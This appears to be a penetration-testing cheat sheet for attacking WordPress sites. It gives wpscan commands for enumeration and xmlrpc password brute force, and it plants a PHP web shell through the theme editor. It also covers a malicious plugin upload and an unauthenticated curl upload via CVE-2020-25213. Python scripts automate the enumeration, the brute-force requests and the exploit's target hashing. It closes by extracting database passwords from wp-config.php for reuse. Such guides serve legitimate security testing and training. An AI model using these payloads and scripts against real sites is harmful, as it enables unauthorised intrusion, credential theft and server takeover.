WordPress

What it is: The most popular CMS on the internet, powering roughly 40% of all websites. Plugins and themes are the primary attack surface; core is rarely the way in when it is kept updated, so enumerate what is installed before trying anything else.

Default ports: 80, 443

Vuln research:


Enumerate WordPress

Full enumeration: users, plugins, themes, versions. The API token (free from wpscan.com) is what adds known-vulnerability data to the output; without it wpscan still enumerates but reports nothing about CVEs.

wpscan --url http://$IP/ -e ap,at,u --api-token YOUR_TOKEN
Example Output
[+] WordPress version 5.7.2
[+] User(s) Identified:
 - admin
 - editor
[+] Plugins Found:
 - wp-file-manager 6.0 (vulnerable!)
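The same passive checks wpscan performs can be done by hand when the tool is unavailable or too noisy: the generator meta tag gives the core version, asset URLs under /wp-content/plugins/ and /wp-content/themes/ give plugin and theme slugs (with the version the plugin appended as ?ver=), and the REST endpoint /wp-json/wp/v2/users lists user slugs on default installs. This is an added example, not code from the original page or from wpscan; the HTML, JSON and the fetch helper's URL layout are constructed assumptions.

```python
import json
import re
import urllib.request

# Constructed sample responses (not captured from a real site).
SAMPLE_HTML = """<html><head>
<meta name="generator" content="WordPress 5.7.2" />
<link rel='stylesheet' href='http://target/wp-content/plugins/wp-file-manager/css/style.css?ver=6.0' />
<link rel='stylesheet' href='http://target/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.4' />
<script src='http://target/wp-content/plugins/contact-form-7/includes/js/index.js'></script>
<link rel='stylesheet' href='http://target/wp-content/themes/twentytwentyone/style.css?ver=1.3' />
</head><body></body></html>"""

SAMPLE_USERS_JSON = json.dumps([
    {"id": 1, "name": "Site Admin", "slug": "admin"},
    {"id": 2, "name": "Editor", "slug": "editor"},
])

# Matches /wp-content/<kind>/<slug>/...?ver=X.Y inside a quoted attribute value.
ASSET_RE = r"/wp-content/{kind}/([\w-]+)/[^'\"\s]*?(?:\?ver=([\d.]+))?['\"]"


def version_from_html(html):
    """Core version from the generator meta tag (absent if the site strips it)."""
    m = re.search(r'<meta name="generator" content="WordPress ([\d.]+)"', html)
    return m.group(1) if m else None


def components_from_html(html, kind):
    """Plugin or theme slugs referenced by the page, mapped to the ?ver= seen (or None).

    kind is 'plugins' or 'themes'. The ?ver= value is whatever the component
    enqueued, usually but not always its own version; confirm via its readme.txt.
    """
    found = {}
    for slug, ver in re.findall(ASSET_RE.format(kind=kind), html):
        if found.get(slug) is None:
            found[slug] = ver or None
    return found


def users_from_rest(body):
    """User slugs (login names on default installs) from /wp-json/wp/v2/users."""
    return [u["slug"] for u in json.loads(body)]


def fetch(url):
    """Live helper (not exercised offline): GET a URL and return the body as text."""
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
    with urllib.request.urlopen(req, timeout=10) as r:
        return r.read().decode(errors="replace")


def enumerate_site(base_url):
    """Assumed live usage: base_url like http://10.10.10.10/ (trailing slash)."""
    html = fetch(base_url)
    report = {
        "version": version_from_html(html),
        "plugins": components_from_html(html, "plugins"),
        "themes": components_from_html(html, "themes"),
    }
    try:
        report["users"] = users_from_rest(fetch(base_url + "wp-json/wp/v2/users"))
    except Exception:
        report["users"] = None  # endpoint disabled or blocked; fall back to ?author=N
    return report


if __name__ == "__main__":
    print(version_from_html(SAMPLE_HTML))
    print(components_from_html(SAMPLE_HTML, "plugins"))
    print(users_from_rest(SAMPLE_USERS_JSON))
```

If the REST users endpoint is blocked, the classic fallback is requesting /?author=1, /?author=2 and so on and reading the slug out of the redirect to /author/<slug>/.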

Brute force WordPress login

Target /wp-login.php with the usernames found during enumeration. `--password-attack xmlrpc` sends one wp.getUsersBlogs call per guess to xmlrpc.php, which sidesteps login-page rate limiting and most lockout plugins; it only works when xmlrpc.php is enabled (many hosts disable it). The `xmlrpc-multicall` mode is no faster on WordPress 4.4 and later, because core rejects every further login in a request once one has failed.

wpscan --url http://$IP/ -U admin -P /usr/share/wordlists/rockyou.txt --password-attack xmlrpc
Example Output
[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - admin / monkey123
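What wpscan's xmlrpc attack actually exchanges with the server, as an added example (not code from the page or from wpscan): a wp.getUsersBlogs request per guess, and a response that is either an array of blogs (valid credentials) or a fault. Fault code 403 means wrong credentials; 405 means XML-RPC is disabled. The multicall builder is included to show the old batching trick, with the caveat that on WordPress 4.4+ only the first guess in a batch is really evaluated. All sample responses are constructed with the standard library's own serializer; the target URL is an assumption.

```python
import urllib.request
import xmlrpc.client


def build_login_call(username, password):
    """Request body for a single credential check (what `--password-attack xmlrpc` sends)."""
    return xmlrpc.client.dumps((username, password), methodname="wp.getUsersBlogs")


def build_multicall(username, passwords):
    """Request body batching several guesses into one system.multicall.

    On WordPress 4.4+ the server flags the first failed login and fails the rest
    of the batch without checking them, so this yields one real guess per request.
    """
    calls = [{"methodName": "wp.getUsersBlogs", "params": [username, pw]} for pw in passwords]
    return xmlrpc.client.dumps((calls,), methodname="system.multicall")


def classify_login_response(xml_text):
    """'success', 'bad-creds', 'disabled' or 'error' for a single-call response."""
    try:
        params, _ = xmlrpc.client.loads(xml_text)
    except xmlrpc.client.Fault as f:
        if f.faultCode == 403:
            return "bad-creds"
        if f.faultCode == 405:
            return "disabled"
        return "error"
    return "success" if isinstance(params[0], list) else "error"


def hits_from_multicall(xml_text, passwords):
    """Passwords whose slot in a multicall response is a result rather than a fault struct."""
    params, _ = xmlrpc.client.loads(xml_text)
    hits = []
    for pw, res in zip(passwords, params[0]):
        if isinstance(res, dict) and "faultCode" in res:
            continue
        hits.append(pw)
    return hits


def post_xmlrpc(url, body):
    """Live helper (not exercised offline): POST XML to xmlrpc.php and return the reply."""
    req = urllib.request.Request(url, data=body.encode(), headers={"Content-Type": "text/xml"})
    with urllib.request.urlopen(req, timeout=10) as r:
        return r.read().decode()


def guess_passwords(url, username, wordlist):
    """Assumed live usage: url like http://10.10.10.10/xmlrpc.php. Stops on first hit."""
    for pw in wordlist:
        verdict = classify_login_response(post_xmlrpc(url, build_login_call(username, pw)))
        if verdict == "disabled":
            return None
        if verdict == "success":
            return pw
    return None


# Constructed responses in the shape WordPress returns (not captured from a real host).
BLOG = {"isAdmin": True, "url": "http://target/", "blogid": "1",
        "blogName": "Target", "xmlrpc": "http://target/xmlrpc.php"}
SAMPLE_OK = xmlrpc.client.dumps(([BLOG],), methodresponse=True)
SAMPLE_FAIL = xmlrpc.client.dumps(
    xmlrpc.client.Fault(403, "Incorrect username or password."), methodresponse=True)
SAMPLE_DISABLED = xmlrpc.client.dumps(
    xmlrpc.client.Fault(405, "XML-RPC services are disabled on this site."), methodresponse=True)
SAMPLE_MULTI = xmlrpc.client.dumps(([
    {"faultCode": 403, "faultString": "Incorrect username or password."},
    [[BLOG]],  # multicall wraps each successful return value in a one-element array
],), methodresponse=True)

if __name__ == "__main__":
    print(build_login_call("admin", "monkey123"))
    print(classify_login_response(SAMPLE_OK), classify_login_response(SAMPLE_FAIL))
    print(hits_from_multicall(SAMPLE_MULTI, ["wrong", "monkey123"]))
```

A quick pre-flight before any brute force is a system.listMethods call: a 405 fault or an HTTP 403 from the web server means the endpoint is off and the wp-login.php mode is the only option.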

RCE via Theme Editor

Edit a PHP theme file to inject a shell. Requires an administrator account, and the editor is absent when DISALLOW_FILE_EDIT is set to true in wp-config.php (fall back to plugin upload in that case). Use the slug of the active theme in the URL.

# Appearance → Theme Editor → 404.php (any PHP file in the active theme works)
# Replace the file's content with:
<?php system($_GET['cmd']); ?>
# Visit the file directly; the path uses the active theme's slug:
# http://$IP/wp-content/themes/twentytwentyone/404.php?cmd=id
Example Output
uid=33(www-data) gid=33(www-data)

RCE via Plugin Upload

Upload a malicious plugin ZIP. Requires an administrator account and works even when DISALLOW_FILE_EDIT is set (only DISALLOW_FILE_MODS blocks it). The file must carry a plugin header, otherwise WordPress rejects the archive with "No valid plugins were found".

# Create a minimal plugin: the header comment is mandatory
cat > shell.php <<'EOF'
<?php
/*
Plugin Name: shell
*/
system($_GET['cmd']);
EOF
zip plugin-shell.zip shell.php
# Plugins → Add New → Upload Plugin → Install Now
# Activation is not needed; the file is reachable directly.
# A ZIP with no top-level folder is unpacked into a directory named after the archive:
# Visit: http://$IP/wp-content/plugins/plugin-shell/shell.php?cmd=id

WP File Manager RCE (CVE-2020-25213)

Unauthenticated file upload: wp-file-manager before 6.9 ships elFinder's connector.minimal.php without any authentication, so anyone can invoke its upload command. Check the version first via http://$IP/wp-content/plugins/wp-file-manager/readme.txt (Stable tag). The target parameter is elFinder's hash of the upload directory ("l1_Lw" is "/"); uploads land in lib/files/.

curl -F 'cmd=upload' -F 'target=l1_Lw' -F 'upload[]=@shell.php' http://$IP/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php
# Then: http://$IP/wp-content/plugins/wp-file-manager/lib/files/shell.php?cmd=id
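Two things worth scripting before firing this: a version gate that reads the plugin's readme.txt (wpscan's `--api-token` output does the same lookup), and the elFinder target hash, so a directory other than "/" can be addressed. elFinder encodes a path as base64 with `+/=` mapped to `-_.`, trailing dots stripped, and the volume id (here `l1_`) prefixed; that is why "/" becomes `l1_Lw`. This is an added example, not code from the page, the plugin or elFinder; the readme text and URLs are constructed assumptions.

```python
import base64
import re
import urllib.request

FIXED_IN = "6.9"  # CVE-2020-25213 was fixed in wp-file-manager 6.9

# Constructed readme.txt excerpt in the WordPress.org plugin format.
SAMPLE_README = """=== File Manager ===
Contributors: mndpsingh287
Requires at least: 4.0
Tested up to: 5.5
Stable tag: 6.8
"""


def elfinder_hash(path, volume_id="l1_"):
    """Reproduce elFinder's path hash: base64, +/= -> -_., trailing dots removed, volume prefix."""
    enc = base64.b64encode(path.encode()).decode().translate(str.maketrans("+/=", "-_."))
    return volume_id + enc.rstrip(".")


def parse_stable_tag(readme_txt):
    """Plugin version from the 'Stable tag:' line of a WordPress.org readme.txt."""
    m = re.search(r"^Stable tag:\s*([\d.]+)", readme_txt, re.M)
    return m.group(1) if m else None


def version_tuple(v):
    """'6.10' > '6.9' must hold, so compare numerically rather than as strings."""
    return tuple(int(x) for x in v.split("."))


def wpfm_is_vulnerable(version):
    return version_tuple(version) < version_tuple(FIXED_IN)


def build_upload_curl(base_url, local_file, target_dir="/"):
    """The curl command from the page, with the target hash computed for any directory."""
    connector = base_url.rstrip("/") + "/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
    return (f"curl -F 'cmd=upload' -F 'target={elfinder_hash(target_dir)}' "
            f"-F 'upload[]=@{local_file}' {connector}")


def check_target(base_url):
    """Assumed live usage: fetch readme.txt and decide whether to proceed."""
    url = base_url.rstrip("/") + "/wp-content/plugins/wp-file-manager/readme.txt"
    with urllib.request.urlopen(url, timeout=10) as r:
        version = parse_stable_tag(r.read().decode(errors="replace"))
    if version is None:
        return None
    return wpfm_is_vulnerable(version)


if __name__ == "__main__":
    v = parse_stable_tag(SAMPLE_README)
    print(v, "vulnerable" if wpfm_is_vulnerable(v) else "patched")
    print(build_upload_curl("http://10.10.10.10", "shell.php"))
```

Stable tag is what the plugin author declared, so a site running a manually patched copy may still advertise an old number; treat the gate as a reason to try, not proof of success.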

Extract credentials from wp-config.php

Database credentials are stored in plaintext and are often reused elsewhere. The web root varies by distribution; locate the file with `find / -name wp-config.php 2>/dev/null` if it is not under /var/www/html.

grep -i "DB_" /var/www/html/wp-config.php
Example Output
define('DB_NAME', 'wordpress');
define('DB_USER', 'wp_admin');
define('DB_PASSWORD', 'SuperSecretDBPass!');
define('DB_HOST', 'localhost');
Try this password against MySQL first (mysql -u wp_admin -p), then SSH, FTP and any other service on the host. The same file also holds the AUTH_KEY/SALT values and sometimes SMTP, backup or API credentials added by plugins.